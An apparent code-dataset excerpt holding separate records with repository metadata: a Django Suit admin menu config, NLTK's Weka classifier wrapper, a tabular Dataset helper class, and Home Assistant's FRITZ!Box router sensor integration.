url=f'/{APP_NAME}/manage/id_generate/boxid/import/',
permissions='id_generate.change_boxid',
icon='fa fa-cube'),
ParentItem(
label='Generate new Plate ID''s',
url=f'/{APP_NAME}/manage/id_generate/plateid/import/',
permissions='id_generate.change_plateid',
icon='fa fa-circle-o-notch'),
ParentItem(
label='Authorization',
children=[
ChildItem('Staff', model='auth.user'),
ChildItem(model='auth.group'),
ChildItem(model='admin.logentry'),
],
icon='fa fa-user-circle'),
ParentItem(
label='SOP and Request Sheet',
use_first_child_url=False,
url='',
children=[
ChildItem('View JAX ID Request SOP',
target_blank=True,
url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'),
ChildItem('View JAX ID Request Template Sheet',
url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'),
],
icon='fa fa-file'),
)
# menu_handler = None
menu_show_home = False
# Show changelist top actions only if any row is selected
toggle_changelist_top_actions = False
# # Enables two column layout for change forms with submit row on the right
form_submit_on_right = False
# Hide name/"original" column for all tabular inlines.
# May be overridden in Inline class by suit_form_inlines_hide_original = False
#form_inlines_hide_original = False
form_size = {
'default': apps.SUIT_FORM_SIZE_LARGE,
'widgets': {
'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE,
'Textarea': apps.SUIT_FORM_SIZE_X_LARGE,
},
}
# form_size setting can be overridden in ModelAdmin using suit_form_size parameter
#
# Example:
# ----------------------------------------------
# suit_form_size = {
# 'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10',
# 'fields': {
# 'field_name': SUIT_FORM_SIZE_LARGE,
# 'field_name2': SUIT_FORM_SIZE_X_LARGE,
# },
# 'widgets': {
# 'widget_class_name': SUIT_FORM_SIZE_FULL,
# 'AdminTextareaWidget': SUIT_FORM_SIZE_FULL,
# },
# 'fieldsets': {
# 'fieldset_name': SUIT_FORM_SIZE_FULL,
# 'fieldset_name2': SUIT_FORM_SIZE_FULL,
# }
# }
| 37.803279
| 198
| 0.550954
| 481
| 4,612
| 5.064449
| 0.370062
| 0.053366
| 0.054187
| 0.059113
| 0.245895
| 0.151067
| 0.108374
| 0.108374
| 0.024631
| 0
| 0
| 0.011792
| 0.338031
| 4,612
| 121
| 199
| 38.115702
| 0.786112
| 0.208803
| 0
| 0.225
| 0
| 0.025
| 0.305249
| 0.152762
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0875
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869a42d471e5a0264cf98babfcdd88a6669b3cbc
| 12,970
|
py
|
Python
|
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/classify/weka.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/classify/weka.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/classify/weka.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# Natural Language Toolkit: Interface to Weka Classsifiers
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Edward Loper <edloper@gmail.com>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Classifiers that make use of the external 'Weka' package.
"""
from __future__ import print_function
import time
import tempfile
import os
import subprocess
import re
import zipfile
from sys import stdin
from nltk import compat
from nltk.probability import DictionaryProbDist
from nltk.internals import java, config_java
from nltk.classify.api import ClassifierI
_weka_classpath = None
_weka_search = ['.',
'/usr/share/weka',
'/usr/local/share/weka',
'/usr/lib/weka',
'/usr/local/lib/weka',]
def config_weka(classpath=None):
global _weka_classpath
# Make sure java's configured first.
config_java()
if classpath is not None:
_weka_classpath = classpath
if _weka_classpath is None:
searchpath = _weka_search
if 'WEKAHOME' in os.environ:
searchpath.insert(0, os.environ['WEKAHOME'])
for path in searchpath:
if os.path.exists(os.path.join(path, 'weka.jar')):
_weka_classpath = os.path.join(path, 'weka.jar')
version = _check_weka_version(_weka_classpath)
if version:
print(('[Found Weka: %s (version %s)]' %
(_weka_classpath, version)))
else:
print('[Found Weka: %s]' % _weka_classpath)
_check_weka_version(_weka_classpath)
if _weka_classpath is None:
raise LookupError('Unable to find weka.jar! Use config_weka() '
'or set the WEKAHOME environment variable. '
'For more information about Weka, please see '
'http://www.cs.waikato.ac.nz/ml/weka/')
def _check_weka_version(jar):
try:
zf = zipfile.ZipFile(jar)
except SystemExit as KeyboardInterrupt:
raise
except:
return None
try:
try:
return zf.read('weka/core/version.txt')
except KeyError:
return None
finally:
zf.close()
class WekaClassifier(ClassifierI):
def __init__(self, formatter, model_filename):
self._formatter = formatter
self._model = model_filename
def prob_classify_many(self, featuresets):
return self._classify_many(featuresets, ['-p', '0', '-distribution'])
def classify_many(self, featuresets):
return self._classify_many(featuresets, ['-p', '0'])
def _classify_many(self, featuresets, options):
# Make sure we can find java & weka.
config_weka()
temp_dir = tempfile.mkdtemp()
try:
# Write the test data file.
test_filename = os.path.join(temp_dir, 'test.arff')
self._formatter.write(test_filename, featuresets)
# Call weka to classify the data.
cmd = ['weka.classifiers.bayes.NaiveBayes',
'-l', self._model, '-T', test_filename] + options
(stdout, stderr) = java(cmd, classpath=_weka_classpath,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Check if something went wrong:
if stderr and not stdout:
if 'Illegal options: -distribution' in stderr:
raise ValueError('The installed version of weka does '
'not support probability distribution '
'output.')
else:
raise ValueError('Weka failed to generate output:\n%s'
% stderr)
# Parse weka's output.
return self.parse_weka_output(stdout.decode(stdin.encoding).split('\n'))
finally:
for f in os.listdir(temp_dir):
os.remove(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
def parse_weka_distribution(self, s):
probs = [float(v) for v in re.split('[*,]+', s) if v.strip()]
probs = dict(zip(self._formatter.labels(), probs))
return DictionaryProbDist(probs)
def parse_weka_output(self, lines):
# Strip unwanted text from stdout
for i,line in enumerate(lines):
if line.strip().startswith("inst#"):
lines = lines[i:]
break
if lines[0].split() == ['inst#', 'actual', 'predicted',
'error', 'prediction']:
return [line.split()[2].split(':')[1]
for line in lines[1:] if line.strip()]
elif lines[0].split() == ['inst#', 'actual', 'predicted',
'error', 'distribution']:
return [self.parse_weka_distribution(line.split()[-1])
for line in lines[1:] if line.strip()]
# is this safe:?
elif re.match(r'^0 \w+ [01]\.[0-9]* \?\s*$', lines[0]):
return [line.split()[1] for line in lines if line.strip()]
else:
for line in lines[:10]:
print(line)
raise ValueError('Unhandled output format -- your version '
'of weka may not be supported.\n'
' Header: %s' % lines[0])
# [xx] full list of classifiers (some may be abstract?):
# ADTree, AODE, BayesNet, ComplementNaiveBayes, ConjunctiveRule,
# DecisionStump, DecisionTable, HyperPipes, IB1, IBk, Id3, J48,
# JRip, KStar, LBR, LeastMedSq, LinearRegression, LMT, Logistic,
# LogisticBase, M5Base, MultilayerPerceptron,
# MultipleClassifiersCombiner, NaiveBayes, NaiveBayesMultinomial,
# NaiveBayesSimple, NBTree, NNge, OneR, PaceRegression, PART,
# PreConstructedLinearModel, Prism, RandomForest,
# RandomizableClassifier, RandomTree, RBFNetwork, REPTree, Ridor,
# RuleNode, SimpleLinearRegression, SimpleLogistic,
# SingleClassifierEnhancer, SMO, SMOreg, UserClassifier, VFI,
# VotedPerceptron, Winnow, ZeroR
_CLASSIFIER_CLASS = {
'naivebayes': 'weka.classifiers.bayes.NaiveBayes',
'C4.5': 'weka.classifiers.trees.J48',
'log_regression': 'weka.classifiers.functions.Logistic',
'svm': 'weka.classifiers.functions.SMO',
'kstar': 'weka.classifiers.lazy.KStar',
'ripper': 'weka.classifiers.rules.JRip',
}
@classmethod
def train(cls, model_filename, featuresets,
classifier='naivebayes', options=[], quiet=True):
# Make sure we can find java & weka.
config_weka()
# Build an ARFF formatter.
formatter = ARFF_Formatter.from_train(featuresets)
temp_dir = tempfile.mkdtemp()
try:
# Write the training data file.
train_filename = os.path.join(temp_dir, 'train.arff')
formatter.write(train_filename, featuresets)
if classifier in cls._CLASSIFIER_CLASS:
javaclass = cls._CLASSIFIER_CLASS[classifier]
elif classifier in cls._CLASSIFIER_CLASS.values():
javaclass = classifier
else:
raise ValueError('Unknown classifier %s' % classifier)
# Train the weka model.
cmd = [javaclass, '-d', model_filename, '-t', train_filename]
cmd += list(options)
if quiet:
stdout = subprocess.PIPE
else: stdout = None
java(cmd, classpath=_weka_classpath, stdout=stdout)
# Return the new classifier.
return WekaClassifier(formatter, model_filename)
finally:
for f in os.listdir(temp_dir):
os.remove(os.path.join(temp_dir, f))
os.rmdir(temp_dir)
class ARFF_Formatter:
"""
Converts featuresets and labeled featuresets to ARFF-formatted
strings, appropriate for input into Weka.
Features and classes can be specified manually in the constructor, or may
be determined from data using ``from_train``.
"""
def __init__(self, labels, features):
"""
:param labels: A list of all class labels that can be generated.
:param features: A list of feature specifications, where
each feature specification is a tuple (fname, ftype);
and ftype is an ARFF type string such as NUMERIC or
STRING.
"""
self._labels = labels
self._features = features
def format(self, tokens):
"""Returns a string representation of ARFF output for the given data."""
return self.header_section() + self.data_section(tokens)
def labels(self):
"""Returns the list of classes."""
return list(self._labels)
def write(self, outfile, tokens):
"""Writes ARFF data to a file for the given data."""
if not hasattr(outfile, 'write'):
outfile = open(outfile, 'w')
outfile.write(self.format(tokens))
outfile.close()
@staticmethod
def from_train(tokens):
"""
Constructs an ARFF_Formatter instance with class labels and feature
types determined from the given data. Handles boolean, numeric and
string (note: not nominal) types.
"""
# Find the set of all attested labels.
labels = set(label for (tok, label) in tokens)
# Determine the types of all features.
features = {}
for tok, label in tokens:
for (fname, fval) in tok.items():
if issubclass(type(fval), bool):
ftype = '{True, False}'
elif issubclass(type(fval), (compat.integer_types, float, bool)):
ftype = 'NUMERIC'
elif issubclass(type(fval), compat.string_types):
ftype = 'STRING'
elif fval is None:
continue # can't tell the type.
else:
raise ValueError('Unsupported value type %r' % ftype)
if features.get(fname, ftype) != ftype:
raise ValueError('Inconsistent type for %s' % fname)
features[fname] = ftype
features = sorted(features.items())
return ARFF_Formatter(labels, features)
def header_section(self):
"""Returns an ARFF header as a string."""
# Header comment.
s = ('% Weka ARFF file\n' +
'% Generated automatically by NLTK\n' +
'%% %s\n\n' % time.ctime())
# Relation name
s += '@RELATION rel\n\n'
# Input attribute specifications
for fname, ftype in self._features:
s += '@ATTRIBUTE %-30r %s\n' % (fname, ftype)
# Label attribute specification
s += '@ATTRIBUTE %-30r {%s}\n' % ('-label-', ','.join(self._labels))
return s
def data_section(self, tokens, labeled=None):
"""
Returns the ARFF data section for the given data.
:param tokens: a list of featuresets (dicts) or labelled featuresets
which are tuples (featureset, label).
:param labeled: Indicates whether the given tokens are labeled
or not. If None, then the tokens will be assumed to be
labeled if the first token's value is a tuple or list.
"""
# Check if the tokens are labeled or unlabeled. If unlabeled,
# then use 'None'
if labeled is None:
labeled = tokens and isinstance(tokens[0], (tuple, list))
if not labeled:
tokens = [(tok, None) for tok in tokens]
# Data section
s = '\n@DATA\n'
for (tok, label) in tokens:
for fname, ftype in self._features:
s += '%s,' % self._fmt_arff_val(tok.get(fname))
s += '%s\n' % self._fmt_arff_val(label)
return s
def _fmt_arff_val(self, fval):
if fval is None:
return '?'
elif isinstance(fval, (bool, compat.integer_types)):
return '%s' % fval
elif isinstance(fval, float):
return '%r' % fval
else:
return '%r' % fval
if __name__ == '__main__':
from nltk.classify.util import names_demo, binary_names_demo_features
def make_classifier(featuresets):
return WekaClassifier.train('/tmp/name.model', featuresets,
'C4.5')
classifier = names_demo(make_classifier, binary_names_demo_features)
| 37.485549
| 85
| 0.562606
| 1,395
| 12,970
| 5.119713
| 0.273118
| 0.023663
| 0.008401
| 0.007841
| 0.158499
| 0.130916
| 0.092691
| 0.055447
| 0.055447
| 0.045645
| 0
| 0.005129
| 0.338551
| 12,970
| 345
| 86
| 37.594203
| 0.827369
| 0.210486
| 0
| 0.166667
| 0
| 0
| 0.130976
| 0.026237
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.060185
| 0.013889
| 0.25463
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869a8a31a260884a519f22c5d9a29b22876f051f
| 5,502
|
py
|
Python
|
src/si/data/dataset.py
|
pg428/SIB
|
b887c2011eb3a04d119a93b3932785d182e331d3
|
[
"Apache-2.0"
] | null | null | null |
src/si/data/dataset.py
|
pg428/SIB
|
b887c2011eb3a04d119a93b3932785d182e331d3
|
[
"Apache-2.0"
] | null | null | null |
src/si/data/dataset.py
|
pg428/SIB
|
b887c2011eb3a04d119a93b3932785d182e331d3
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
import numpy as np
from src.si.util.util import label_gen
__all__ = ['Dataset']
class Dataset:
def __init__(self, X=None, Y=None,
xnames: list = None,
yname: str = None):
""" Tabular Dataset"""
if X is None:
raise Exception("Trying to instanciate a DataSet without any data")
self.X = X
self.Y = Y
self.xnames = xnames if xnames else label_gen(X.shape[1])
self.yname = yname if yname else 'Y'
@classmethod
def from_data(cls, filename, sep=",", labeled=True):
"""Creates a DataSet from a data file.
:param filename: The filename
:type filename: str
:param sep: attributes separator, defaults to ","
:type sep: str, optional
:return: A DataSet object
:rtype: DataSet
"""
data = np.genfromtxt(filename, delimiter=sep)
if labeled:
X = data[:, 0:-1]
Y = data[:, -1]
else:
X = data
Y = None
return cls(X, Y)
@classmethod
def from_dataframe(cls, df, ylabel=None):
"""Creates a DataSet from a pandas dataframe.
:param df: [description]
:type df: [type]
:param ylabel: [description], defaults to None
:type ylabel: [type], optional
:return: [description]
:rtype: [type]
"""
if ylabel and ylabel in df.columns:
X = df.loc[:, df.columns != ylabel].to_numpy() #transforma num array de numpy
Y = df.loc[:, ylabel].to_numpy()
# xnames = df.columns.tolist().remove(ylabel)
yname = ylabel
xnames = df.columns.tolist()
for name in xnames:
if name == yname:
xnames.remove(yname)
else:
X = df.to_numpy()
Y = None
xnames = df.columns.tolist()
yname = None
return cls(X, Y, xnames, yname)
def __len__(self):
"""Returns the number of data points."""
return self.X.shape[0]
def hasLabel(self):
"""Returns True if the dataset constains labels (a dependent variable)"""
return self.Y is not None
def getNumFeatures(self):
"""Returns the number of features"""
return self.X.shape[1]
def getNumClasses(self):
"""Returns the number of label classes or 0 if the dataset has no dependent variable."""
return len(np.unique(self.Y)) if self.hasLabel() else 0
def writeDataset(self, filename, sep=","):
"""Saves the dataset to a file
:param filename: The output file path
:type filename: str
:param sep: The fields separator, defaults to ","
:type sep: str, optional
"""
fullds = np.hstack((self.X, self.Y.reshape(len(self.Y), 1)))
np.savetxt(filename, fullds, delimiter=sep)
def toDataframe(self):
""" Converts the dataset into a pandas DataFrame"""
if self.hasLabel():
df = pd.DataFrame(np.hstack((self.X, self.Y.reshape(len(self.Y), 1))), columns=self.xnames[:]+[self.yname]) #columns=np.hstack((self.xnames, self.yname)))
else:
df = pd.DataFrame(self.X.copy(), columns=self.xnames[:])
return df
def getXy(self):
return self.X, self.Y
def summary(dataset, format='df'):
""" Returns the statistics of a dataset(mean, std, max, min)
:param dataset: A Dataset object
:type dataset: si.data.Dataset
:param format: Output format ('df':DataFrame, 'dict':dictionary ), defaults to 'df'
:type format: str, optional
"""
if format not in ["df", "dict"]:
raise Exception("Invalid format. Choose between 'df' and 'dict'.")
if dataset.hasLabel():
data = np.hstack((dataset.X, dataset.Y.reshape(len(dataset.Y), 1)))
#data = np.hstack([dataset.X, np.reshape(dataset.Y, (-1, 1))])
columns = dataset.xnames[:] + [dataset.yname]
else:
data = dataset.X
columns = dataset.xnames[:]
stats = {}
if type(dataset.Y[0]) is str:
for i in range(data.shape[1]-1): #ve colunas
_means = np.mean(data[:, i], axis=0)
_vars = np.var(data[:, i], axis=0)
_maxs = np.max(data[:, i], axis=0)
_mins = np.min(data[:, i], axis=0)
stat = {"mean": _means,
"var": _vars,
"max": _maxs,
"min": _mins
}
stats[columns[i]] = stat
else:
for i in range(data.shape[1]): # ve colunas
_means = np.mean(data[:, i], axis=0)
_vars = np.var(data[:, i], axis=0)
_maxs = np.max(data[:, i], axis=0)
_mins = np.min(data[:, i], axis=0)
stat = {"mean": _means,
"var": _vars,
"max": _maxs,
"min": _mins
}
stats[columns[i]] = stat
# _means = np.mean(data, axis=0)
# _vars = np.var(data, axis=0)
# _maxs = np.max(data, axis=0)
# _mins = np.min(data, axis=0)
# stats = {}
# for i in range(data.shape[1]):
# stat = {"mean": _means[i],
# "var": _vars[i],
# "max": _maxs[i],
# "min": _mins[i]
# }
# stats[columns[i]] = stat
if format == "dict":
return stats
else:
return pd.DataFrame(stats)
| 32.364706
| 166
| 0.526172
| 683
| 5,502
| 4.175695
| 0.196193
| 0.021038
| 0.025245
| 0.02805
| 0.265778
| 0.187938
| 0.169004
| 0.121318
| 0.121318
| 0.121318
| 0
| 0.008242
| 0.338422
| 5,502
| 169
| 167
| 32.556213
| 0.775275
| 0.290622
| 0
| 0.309278
| 0
| 0
| 0.039114
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113402
| false
| 0
| 0.030928
| 0.010309
| 0.257732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869e135c2c869c0e98bb08d38ef8fc9d0c3c1530
| 11,744
|
py
|
Python
|
homeassistant/components/fritz/sensor.py
|
EuleMitKeule/core
|
3af54d96c7dcc3f7087d1196e6ab0db029301ee7
|
[
"Apache-2.0"
] | 3
|
2022-02-18T14:03:39.000Z
|
2022-03-26T20:26:55.000Z
|
homeassistant/components/fritz/sensor.py
|
EuleMitKeule/core
|
3af54d96c7dcc3f7087d1196e6ab0db029301ee7
|
[
"Apache-2.0"
] | 74
|
2020-08-05T07:20:27.000Z
|
2022-03-23T12:47:28.000Z
|
homeassistant/components/fritz/sensor.py
|
marecabo/home-assistant
|
e33774a61e7fcc88aff752dfa4618dd26a746872
|
[
"Apache-2.0"
] | 2
|
2020-06-06T21:55:32.000Z
|
2022-03-06T04:18:21.000Z
|
"""AVM FRITZ!Box binary sensors."""
from __future__ import annotations
from collections.abc import Callable
from dataclasses import dataclass
from datetime import datetime, timedelta
import logging
from typing import Any, Literal
from fritzconnection.core.exceptions import (
FritzActionError,
FritzActionFailedError,
FritzConnectionException,
FritzInternalError,
FritzServiceError,
)
from fritzconnection.lib.fritzstatus import FritzStatus
from homeassistant.components.sensor import (
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DATA_GIGABYTES,
DATA_RATE_KILOBITS_PER_SECOND,
DATA_RATE_KILOBYTES_PER_SECOND,
DEVICE_CLASS_TIMESTAMP,
ENTITY_CATEGORY_DIAGNOSTIC,
SIGNAL_STRENGTH_DECIBELS,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.util.dt import utcnow
from .common import FritzBoxBaseEntity, FritzBoxTools
from .const import DOMAIN, DSL_CONNECTION, UPTIME_DEVIATION
_LOGGER = logging.getLogger(__name__)
def _uptime_calculation(seconds_uptime: float, last_value: datetime | None) -> datetime:
"""Calculate uptime with deviation."""
delta_uptime = utcnow() - timedelta(seconds=seconds_uptime)
if (
not last_value
or abs((delta_uptime - last_value).total_seconds()) > UPTIME_DEVIATION
):
return delta_uptime
return last_value
def _retrieve_device_uptime_state(
status: FritzStatus, last_value: datetime
) -> datetime:
"""Return uptime from device."""
return _uptime_calculation(status.device_uptime, last_value)
def _retrieve_connection_uptime_state(
status: FritzStatus, last_value: datetime | None
) -> datetime:
"""Return uptime from connection."""
return _uptime_calculation(status.connection_uptime, last_value)
def _retrieve_external_ip_state(status: FritzStatus, last_value: str) -> str:
"""Return external ip from device."""
return status.external_ip # type: ignore[no-any-return]
def _retrieve_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload transmission rate."""
return round(status.transmission_rate[0] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download transmission rate."""
return round(status.transmission_rate[1] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_max_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload max transmission rate."""
return round(status.max_bit_rate[0] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_max_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download max transmission rate."""
return round(status.max_bit_rate[1] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_gb_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload total data."""
return round(status.bytes_sent / 1000 / 1000 / 1000, 1) # type: ignore[no-any-return]
def _retrieve_gb_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download total data."""
return round(status.bytes_received / 1000 / 1000 / 1000, 1) # type: ignore[no-any-return]
def _retrieve_link_kb_s_sent_state(status: FritzStatus, last_value: str) -> float:
"""Return upload link rate."""
return round(status.max_linked_bit_rate[0] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_link_kb_s_received_state(status: FritzStatus, last_value: str) -> float:
"""Return download link rate."""
return round(status.max_linked_bit_rate[1] / 1000, 1) # type: ignore[no-any-return]
def _retrieve_link_noise_margin_sent_state(
status: FritzStatus, last_value: str
) -> float:
"""Return upload noise margin."""
return status.noise_margin[0] / 10 # type: ignore[no-any-return]
def _retrieve_link_noise_margin_received_state(
status: FritzStatus, last_value: str
) -> float:
"""Return download noise margin."""
return status.noise_margin[1] / 10 # type: ignore[no-any-return]
def _retrieve_link_attenuation_sent_state(
status: FritzStatus, last_value: str
) -> float:
"""Return upload line attenuation."""
return status.attenuation[0] / 10 # type: ignore[no-any-return]
def _retrieve_link_attenuation_received_state(
status: FritzStatus, last_value: str
) -> float:
"""Return download line attenuation."""
return status.attenuation[1] / 10 # type: ignore[no-any-return]
@dataclass
class FritzRequireKeysMixin:
"""Fritz sensor data class."""
value_fn: Callable[[FritzStatus, Any], Any]
@dataclass
class FritzSensorEntityDescription(SensorEntityDescription, FritzRequireKeysMixin):
"""Describes Fritz sensor entity."""
connection_type: Literal["dsl"] | None = None
SENSOR_TYPES: tuple[FritzSensorEntityDescription, ...] = (
FritzSensorEntityDescription(
key="external_ip",
name="External IP",
icon="mdi:earth",
value_fn=_retrieve_external_ip_state,
),
FritzSensorEntityDescription(
key="device_uptime",
name="Device Uptime",
device_class=DEVICE_CLASS_TIMESTAMP,
entity_category=ENTITY_CATEGORY_DIAGNOSTIC,
value_fn=_retrieve_device_uptime_state,
),
FritzSensorEntityDescription(
key="connection_uptime",
name="Connection Uptime",
device_class=DEVICE_CLASS_TIMESTAMP,
entity_category=ENTITY_CATEGORY_DIAGNOSTIC,
value_fn=_retrieve_connection_uptime_state,
),
FritzSensorEntityDescription(
key="kb_s_sent",
name="Upload Throughput",
state_class=STATE_CLASS_MEASUREMENT,
native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:upload",
value_fn=_retrieve_kb_s_sent_state,
),
FritzSensorEntityDescription(
key="kb_s_received",
name="Download Throughput",
state_class=STATE_CLASS_MEASUREMENT,
native_unit_of_measurement=DATA_RATE_KILOBYTES_PER_SECOND,
icon="mdi:download",
value_fn=_retrieve_kb_s_received_state,
),
FritzSensorEntityDescription(
key="max_kb_s_sent",
name="Max Connection Upload Throughput",
native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND,
icon="mdi:upload",
entity_category=ENTITY_CATEGORY_DIAGNOSTIC,
value_fn=_retrieve_max_kb_s_sent_state,
),
FritzSensorEntityDescription(
key="max_kb_s_received",
name="Max Connection Download Throughput",
native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND,
icon="mdi:download",
entity_category=ENTITY_CATEGORY_DIAGNOSTIC,
value_fn=_retrieve_max_kb_s_received_state,
),
FritzSensorEntityDescription(
key="gb_sent",
name="GB sent",
state_class=STATE_CLASS_TOTAL_INCREASING,
native_unit_of_measurement=DATA_GIGABYTES,
icon="mdi:upload",
value_fn=_retrieve_gb_sent_state,
),
FritzSensorEntityDescription(
key="gb_received",
name="GB received",
state_class=STATE_CLASS_TOTAL_INCREASING,
native_unit_of_measurement=DATA_GIGABYTES,
icon="mdi:download",
value_fn=_retrieve_gb_received_state,
),
FritzSensorEntityDescription(
key="link_kb_s_sent",
name="Link Upload Throughput",
native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND,
icon="mdi:upload",
value_fn=_retrieve_link_kb_s_sent_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_kb_s_received",
name="Link Download Throughput",
native_unit_of_measurement=DATA_RATE_KILOBITS_PER_SECOND,
icon="mdi:download",
value_fn=_retrieve_link_kb_s_received_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_noise_margin_sent",
name="Link Upload Noise Margin",
native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS,
icon="mdi:upload",
value_fn=_retrieve_link_noise_margin_sent_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_noise_margin_received",
name="Link Download Noise Margin",
native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS,
icon="mdi:download",
value_fn=_retrieve_link_noise_margin_received_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_attenuation_sent",
name="Link Upload Power Attenuation",
native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS,
icon="mdi:upload",
value_fn=_retrieve_link_attenuation_sent_state,
connection_type=DSL_CONNECTION,
),
FritzSensorEntityDescription(
key="link_attenuation_received",
name="Link Download Power Attenuation",
native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS,
icon="mdi:download",
value_fn=_retrieve_link_attenuation_received_state,
connection_type=DSL_CONNECTION,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up entry."""
_LOGGER.debug("Setting up FRITZ!Box sensors")
fritzbox_tools: FritzBoxTools = hass.data[DOMAIN][entry.entry_id]
if (
not fritzbox_tools.connection
or "WANIPConn1" not in fritzbox_tools.connection.services
):
# Only routers are supported at the moment
return
dsl: bool = False
try:
dslinterface = await hass.async_add_executor_job(
fritzbox_tools.connection.call_action,
"WANDSLInterfaceConfig:1",
"GetInfo",
)
dsl = dslinterface["NewEnable"]
except (
FritzInternalError,
FritzActionError,
FritzActionFailedError,
FritzServiceError,
):
pass
entities = [
FritzBoxSensor(fritzbox_tools, entry.title, description)
for description in SENSOR_TYPES
if dsl or description.connection_type != DSL_CONNECTION
]
async_add_entities(entities, True)
class FritzBoxSensor(FritzBoxBaseEntity, SensorEntity):
"""Define FRITZ!Box connectivity class."""
entity_description: FritzSensorEntityDescription
def __init__(
self,
fritzbox_tools: FritzBoxTools,
device_friendly_name: str,
description: FritzSensorEntityDescription,
) -> None:
"""Init FRITZ!Box connectivity class."""
self.entity_description = description
self._last_device_value: str | None = None
self._attr_available = True
self._attr_name = f"{device_friendly_name} {description.name}"
self._attr_unique_id = f"{fritzbox_tools.unique_id}-{description.key}"
super().__init__(fritzbox_tools, device_friendly_name)
def update(self) -> None:
"""Update data."""
_LOGGER.debug("Updating FRITZ!Box sensors")
try:
status: FritzStatus = self._fritzbox_tools.fritz_status
self._attr_available = True
except FritzConnectionException:
_LOGGER.error("Error getting the state from the FRITZ!Box", exc_info=True)
self._attr_available = False
return
self._attr_native_value = (
self._last_device_value
) = self.entity_description.value_fn(status, self._last_device_value)
| 33.458689
| 94
| 0.712364
| 1,315
| 11,744
| 6.003042
| 0.147529
| 0.023942
| 0.041804
| 0.049405
| 0.545984
| 0.49582
| 0.437294
| 0.410312
| 0.400937
| 0.346592
| 0
| 0.008086
| 0.199676
| 11,744
| 350
| 95
| 33.554286
| 0.831791
| 0.091366
| 0
| 0.387218
| 0
| 0
| 0.088146
| 0.017382
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067669
| false
| 0.003759
| 0.06015
| 0
| 0.221805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
